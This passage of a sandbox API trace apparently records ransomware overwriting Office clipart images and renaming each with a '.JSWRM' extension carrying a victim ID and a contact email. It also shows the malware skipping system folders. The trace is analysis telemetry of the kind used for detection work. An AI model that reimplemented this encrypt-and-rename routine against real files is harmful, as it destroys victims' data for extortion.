lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287643.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287643.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.926] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16017) returned 1 [0088.926] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3e90) returned 0x24d210 [0088.926] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3e90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3e90, lpOverlapped=0x0) returned 1 [0088.978] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.978] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3e90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3e90, lpOverlapped=0x0) returned 1 [0088.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.978] CloseHandle (hObject=0x314) returned 1 [0088.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0088.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0088.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0088.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0088.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0088.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0088.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.978] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287643.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287643.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287643.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287643.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0088.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0088.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.981] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3946e4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3946e4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3946e4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x43c5, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0287644.JPG", cAlternateFileName="")) returned 1 [0088.981] lstrcmpiW (lpString1="J0287644.JPG", lpString2=".") returned 1 [0088.981] lstrcmpiW (lpString1="J0287644.JPG", lpString2="..") returned 1 [0088.981] lstrcmpiW (lpString1="J0287644.JPG", lpString2="...") returned 1 [0088.981] lstrcmpiW (lpString1="J0287644.JPG", lpString2="windows") returned -1 [0088.981] lstrcmpiW (lpString1="J0287644.JPG", lpString2="recovery") returned -1 [0088.981] lstrcmpiW (lpString1="J0287644.JPG", lpString2="perflogs") returned -1 [0088.981] lstrcmpiW (lpString1="J0287644.JPG", lpString2="documents and settings") returned 1 [0088.981] lstrcmpiW (lpString1="J0287644.JPG", lpString2="$RECYCLE.BIN") returned 1 [0088.981] lstrcmpiW (lpString1="J0287644.JPG", lpString2="system volume information") returned -1 [0088.981] lstrcmpiW (lpString1="J0287644.JPG", lpString2="msocache") returned -1 [0088.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287644.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287644.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287644.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0088.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287644.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287644.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287644.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0088.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0088.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0088.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287644.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287644.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.983] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17349) returned 1 [0088.983] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x43c0) returned 0x24d210 [0088.983] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x43c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x43c0, lpOverlapped=0x0) returned 1 [0088.987] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.988] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x43c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x43c0, lpOverlapped=0x0) returned 1 [0088.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.988] CloseHandle (hObject=0x314) returned 1 [0088.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0088.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0088.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0088.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0088.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0088.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0088.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.989] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287644.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287644.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287644.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287644.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0088.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0088.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.990] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d86, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0287645.JPG", cAlternateFileName="")) returned 1 [0088.990] lstrcmpiW (lpString1="J0287645.JPG", lpString2=".") returned 1 [0088.990] lstrcmpiW (lpString1="J0287645.JPG", lpString2="..") returned 1 [0088.990] lstrcmpiW (lpString1="J0287645.JPG", lpString2="...") returned 1 [0088.990] lstrcmpiW (lpString1="J0287645.JPG", lpString2="windows") returned -1 [0088.990] lstrcmpiW (lpString1="J0287645.JPG", lpString2="recovery") returned -1 [0088.990] lstrcmpiW (lpString1="J0287645.JPG", lpString2="perflogs") returned -1 [0088.990] lstrcmpiW (lpString1="J0287645.JPG", lpString2="documents and settings") returned 1 [0088.990] lstrcmpiW (lpString1="J0287645.JPG", lpString2="$RECYCLE.BIN") returned 1 [0088.990] lstrcmpiW (lpString1="J0287645.JPG", lpString2="system volume information") returned -1 [0088.990] lstrcmpiW (lpString1="J0287645.JPG", lpString2="msocache") returned -1 [0088.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0088.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287645.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287645.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287645.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0088.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0088.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287645.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287645.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287645.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.991] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0088.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.991] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0088.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287645.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287645.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.992] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=36230) returned 1 [0088.992] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8d80) returned 0x24d210 [0088.992] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8d80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8d80, lpOverlapped=0x0) returned 1 [0088.997] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.997] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8d80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8d80, lpOverlapped=0x0) returned 1 [0088.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.998] CloseHandle (hObject=0x314) returned 1 [0088.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0088.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0088.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0088.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0088.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0088.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0088.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.998] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287645.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287645.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287645.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287645.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0088.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0088.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.999] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d21, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0289430.JPG", cAlternateFileName="")) returned 1 [0088.999] lstrcmpiW (lpString1="J0289430.JPG", lpString2=".") returned 1 [0088.999] lstrcmpiW (lpString1="J0289430.JPG", lpString2="..") returned 1 [0088.999] lstrcmpiW (lpString1="J0289430.JPG", lpString2="...") returned 1 [0088.999] lstrcmpiW (lpString1="J0289430.JPG", lpString2="windows") returned -1 [0089.000] lstrcmpiW (lpString1="J0289430.JPG", lpString2="recovery") returned -1 [0089.000] lstrcmpiW (lpString1="J0289430.JPG", lpString2="perflogs") returned -1 [0089.000] lstrcmpiW (lpString1="J0289430.JPG", lpString2="documents and settings") returned 1 [0089.000] lstrcmpiW (lpString1="J0289430.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.000] lstrcmpiW (lpString1="J0289430.JPG", lpString2="system volume information") returned -1 [0089.000] lstrcmpiW (lpString1="J0289430.JPG", lpString2="msocache") returned -1 [0089.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0089.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0289430.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0289430.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0289430.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0089.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0289430.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0289430.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0289430.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0089.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0089.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0089.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0289430.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0289430.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.002] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11553) returned 1 [0089.002] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d20) returned 0x24d210 [0089.002] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2d20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2d20, lpOverlapped=0x0) returned 1 [0089.004] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.005] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2d20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2d20, lpOverlapped=0x0) returned 1 [0089.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.005] CloseHandle (hObject=0x314) returned 1 [0089.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0089.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 